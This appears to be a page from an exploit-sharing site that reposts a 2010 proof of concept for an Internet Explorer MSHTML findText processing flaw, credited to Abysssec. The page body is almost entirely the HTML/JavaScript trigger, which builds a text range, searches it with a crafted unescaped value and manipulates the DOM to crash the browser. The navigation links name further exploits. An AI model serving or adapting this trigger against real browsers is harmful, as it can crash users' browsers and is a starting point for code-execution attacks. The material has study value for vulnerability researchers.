You are here: hacking technology > Exploit > Content
Hot Articles
Recommend Articles
New Articles
Microsoft Internet Explorer MSHTML Findtext
  Add date: 09/29/2010   Publishing date: 09/29/2010   Hits: 60

<html>
<body>
<input type="button" value="Crachme!" onclick="Search()"/>
<input  type="text" value="Abysssec" id="Abysssec"></textarea>

<script type="text/javascript">
function Search(){
var textinput  = document.getElementById("Abysssec");

var textRange = textinput.createTextRange();
textRange.findText(unescape("%u4141"),-1);
textRange.select(document.getElementById('d'));
document.body.appendChild(textinput);
}
</script>
<p id="p">Abysssec</p>
http://www.exploit-db.com/moaub-27-microsoft-internet-explorer-mshtml-findtext-processing-issue/
</body>
</html>
</p>
</body>
</html>


Prev:SnackAmp 3.1.3B Malicious SMP Buffer Overflow Next:linux/x86 setreuid(0,0) and add reboot command each

Comment:

Category: Home > Exploit